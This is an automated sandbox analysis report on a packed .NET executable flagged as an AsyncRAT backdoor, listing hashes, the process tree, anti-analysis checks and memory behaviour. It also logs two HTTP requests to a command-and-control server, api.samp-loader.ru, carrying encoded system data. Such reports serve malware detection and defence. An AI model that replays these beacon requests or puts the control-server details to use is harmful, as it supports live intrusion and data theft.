Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 30, 2021, 10:26 a.m.	July 30, 2021, 10:30 a.m.

Size	486.0KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`999142f2751bd4d2d1da9a2d558029d3`
SHA256	`5c08819a0402013e935fb78e6349ea1a798c53db14e482267deaf183b06dc436`
CRC32	`E504CD39`
ssdeep	`6144:vqqDLOAbTNroWmxxyznX08XbDYAQU5s6rObagKZ961DkDgdhUxTnwpdHQNqPzGQ3:yqnOq0UXPDYAR5sUM1DGb6HZNwP`
Yara	IsPE32 - (no description) Malicious_Packer_Zero - Malicious Packer OS_Processor_Check_Zero - OS Processor Check Generic_Malware_Zero - Generic Malware Is_DotNET_EXE - (no description) UPX_Zero - UPX packed file PE_Header_Zero - PE File Signature Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT

DhcpcommonFontsession.exe "C:\Users\test22\AppData\Local\Temp\DhcpcommonFontsession.exe"
1864
- lsass.exe "C:\Windows\Prefetch\ReadyBoot\lsass.exe"
  2668

Name	Response	Post-Analysis Lookup
api.samp-loader.ru	A 95.181.163.93	95.181.163.93

IP Address	Status	Action
164.124.101.2	Active	Moloch
95.181.163.93	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (27 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 30, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:20 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:20 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:20 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:20 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:20 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:20 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:20 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:20 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 30, 2021, 10:20 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 30, 2021, 10:19 a.m.			0	0
IsDebuggerPresent July 30, 2021, 10:19 a.m.			0	0
IsDebuggerPresent July 30, 2021, 10:19 a.m.			0	0
IsDebuggerPresent July 30, 2021, 10:19 a.m.			0	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 30, 2021, 10:19 a.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ July 30, 2021, 10:20 a.m.	stacktrace: 0x7fe9294a4b9 0x7fe92942430 mscorlib+0x4ef8a5 @ 0x7fef0eff8a5 mscorlib+0x4ef609 @ 0x7fef0eff609 mscorlib+0x4ef5c7 @ 0x7fef0eff5c7 mscorlib+0x502d21 @ 0x7fef0f12d21 CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef1fdf713 CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef1fdf242 CoUninitializeEE+0x4c167 GetMetaDataInternalInterface-0x2b5b5 clr+0x4f30b @ 0x7fef1fdf30b NGenCreateNGenWorker+0x682d _AxlPublicKeyBlobToPublicKeyToken-0x409df clr+0x216291 @ 0x7fef21a6291 DestroyAssemblyConfigCookie+0x157fc PreBindAssembly-0xc054 clr+0xf6d80 @ 0x7fef2086d80 DestroyAssemblyConfigCookie+0x1578a PreBindAssembly-0xc0c6 clr+0xf6d0e @ 0x7fef2086d0e DestroyAssemblyConfigCookie+0x15701 PreBindAssembly-0xc14f clr+0xf6c85 @ 0x7fef2086c85 DestroyAssemblyConfigCookie+0x15837 PreBindAssembly-0xc019 clr+0xf6dbb @ 0x7fef2086dbb NGenCreateNGenWorker+0x6711 _AxlPublicKeyBlobToPublicKeyToken-0x40afb clr+0x216175 @ 0x7fef21a6175 StrongNameSignatureVerification+0x5a22 GetCLRFunction-0x7712 clr+0x1866ae @ 0x7fef21166ae BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7689652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76fac521 exception.instruction_r: 80 38 00 48 8b 4d 08 e8 fb c6 4b 5e 48 89 45 40 exception.instruction: cmp byte ptr [rax], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fe9294a4b9 registers.r14: 0 registers.r15: 0 registers.rcx: 481619800 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 481622208 registers.r11: 481617168 registers.r8: 4 registers.r9: 0 registers.rdx: 43135336 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

July 30, 2021, 10:20 a.m.

stacktrace:

0x7fe9294a4b9
0x7fe92942430
mscorlib+0x4ef8a5 @ 0x7fef0eff8a5
mscorlib+0x4ef609 @ 0x7fef0eff609
mscorlib+0x4ef5c7 @ 0x7fef0eff5c7
mscorlib+0x502d21 @ 0x7fef0f12d21
CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef1fdf713
CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef1fdf242
CoUninitializeEE+0x4c167 GetMetaDataInternalInterface-0x2b5b5 clr+0x4f30b @ 0x7fef1fdf30b
NGenCreateNGenWorker+0x682d _AxlPublicKeyBlobToPublicKeyToken-0x409df clr+0x216291 @ 0x7fef21a6291
DestroyAssemblyConfigCookie+0x157fc PreBindAssembly-0xc054 clr+0xf6d80 @ 0x7fef2086d80
DestroyAssemblyConfigCookie+0x1578a PreBindAssembly-0xc0c6 clr+0xf6d0e @ 0x7fef2086d0e
DestroyAssemblyConfigCookie+0x15701 PreBindAssembly-0xc14f clr+0xf6c85 @ 0x7fef2086c85
DestroyAssemblyConfigCookie+0x15837 PreBindAssembly-0xc019 clr+0xf6dbb @ 0x7fef2086dbb
NGenCreateNGenWorker+0x6711 _AxlPublicKeyBlobToPublicKeyToken-0x40afb clr+0x216175 @ 0x7fef21a6175
StrongNameSignatureVerification+0x5a22 GetCLRFunction-0x7712 clr+0x1866ae @ 0x7fef21166ae
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7689652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76fac521

exception.instruction_r: 80 38 00 48 8b 4d 08 e8 fb c6 4b 5e 48 89 45 40
exception.instruction: cmp byte ptr [rax], 0
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fe9294a4b9
registers.r14: 0
registers.r15: 0
registers.rcx: 481619800
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 481622208
registers.r11: 481617168
registers.r8: 4
registers.r9: 0
registers.rdx: 43135336
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0

Performs some HTTP requests (2 events)

request

GET http://api.samp-loader.ru/control.php?lF8KllZ=rEiSsOnQXHCc8kKLp7&2j5PKlq1u=opZOW&c94b13721d27475b87989d1218641657=8a5330c20f60bd9030c0fb85bd67f5dd&6d3d78b8326f23a9c284d79a7473fb93=QNjhTO4Q2NiJWMjRWO1IjYwIjM5ADNzQWMiVWNxUjNxIzMmJmY3QGO&lF8KllZ=rEiSsOnQXHCc8kKLp7&2j5PKlq1u=opZOW

request

GET http://api.samp-loader.ru/control.php?lF8KllZ=rEiSsOnQXHCc8kKLp7&2j5PKlq1u=opZOW&6b8b4347da47dc2b696be018eded6f69=wN3IzYlVGN1cTN5ETZlZWNxUGZ3UDN0kTOwMDZxEjZzQ2NhZjM1UGNwgjN3gjM3gzMxIjNwkjM&6d3d78b8326f23a9c284d79a7473fb93=gZlVmYmFTOxU2N5EmMhZTZ0IDOihjY1ITY3gTO2ATOhRGOjNzY1UWN&a7e9471faeb4abd8b84476365044b7b2=d1nIwQTZ0YTO1EGZjZTY2QWO0YDZzMmZ2MjYjlTYzI2NhZzNldDO1IWYlJiOiU2N5ETZzcTYlZGZ0U2MyI2MyMGNhdTM1EDZmFmNyAzMiwiI1AjZ1IzN0UDM3UWZ1gzY0IzY0UGM3IjZwYzMmVjZjRjZyE2NkhjM3IiOiEGNmJWYwATN0YGNxM2NxMTNkZ2NxUjNhlTMllTM5E2Mis3W&397c91ac345c79dff31763c1f8c0fb27=d1nIiojI0gDMzYzMzQ2Y1MmZ0QWY5UjNjVjZkFGO3QzNyQjMwYjIsICM0UGN2kTNhR2Y2EmNklDN2Q2MjZmNzI2Y5E2MidTY2cTZ3gTNiFWZiojIldTOxU2M3EWZmRGNlNjMiNjMjRTY3ETNxQmZhZjMwMjIsISNwYWNycDN1AzNlVWN4MGNyMGNlBzNyYGM2MjZ1Y2Y0YmMhdDZ4IzNiojIhRjZiFGMwUDNmRTMjdTMzUDZmdTM1YTY5ETZ5ETOhNjI7xSfikjSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlEMZRUSPRXRJNnRtJmdsJzY6ZVbaZnSIV1ZjRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5o0UZxmSzIGTCNUYwY1MiRlQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzl0UPRTRU1UdjpWT4dXaNhXQU5UdjpXTp9maJpWOHJWa3lWSTR3aJZTSTVWeS5mYxkjMZl2dpl0cWNjYs5EbJZTSpJmdsJjWspkbJNXSTRmbxMVW3RWbiZnTslkNJNVZwwmMZl2dpl0dVRVT1FleNhHND90dJpGTxMGVNl2bql0ds1WS3AnaJZnWtJmSCh1UpdXaJlXSERmeWdEZp9maJxWMXl1TKhlW6ZFbJNXS5FVUxkWT5FVMVZkUslkNJNlW0ZUbURkQsl0cJNVT4RTeNVXUqlkNJl2YspFbjxmWuNGbOxWSzlUallEZF1EN0kWTnFURJZlQxE1ZBRUTwcGVMFzaHlEcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSDJ0QNdGMDl0dTl1NSlHN2ATYKdzZwwEb0pGcuJna3QXcENVUIplRJF0ULdzYHp1Np9maJxWMXl1TWZUVIp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDOwMjNzMDZjVzYmRDZhlTN2MWNmRWY4cDN3IDNyAjNiwiI1AjNzkjZ0MTYiNGZxQDZzMjZmNjY3QjZ1ITM3UTMiZzN3YmYyczYxIiOiU2N5ETZzcTYlZGZ0U2MyI2MyMGNhdTM1EDZmFmNyAzMiwiI1AjZ1IzN0UDM3UWZ1gzY0IzY0UGM3IjZwYzMmVjZjRjZyE2NkhjM3IiOiEGNmJWYwATN0YGNxM2NxMTNkZ2NxUjNhlTMllTM5E2Mis3W

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

api.samp-loader.ru

description

Russian Federation domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 149 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 1900544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000007b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000900000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2f8b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 2555904 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002280000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002470000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f4000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9314a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9315c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93280000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe931fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93226000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93200000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9314b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9316b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9319c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9316d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93281000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9314c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9315d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9315a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93142000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93282000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93283000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93284000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93285000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe932d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe932d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9319d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 30, 2021, 10:19 a.m.	process_identifier: 1864 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93286000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (2 events)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW July 30, 2021, 10:19 a.m.	total_number_of_free_bytes: 12311535616 free_bytes_available: 12311535616 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0
GetDiskFreeSpaceExW July 30, 2021, 10:19 a.m.	total_number_of_free_bytes: 12306313216 free_bytes_available: 12306313216 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
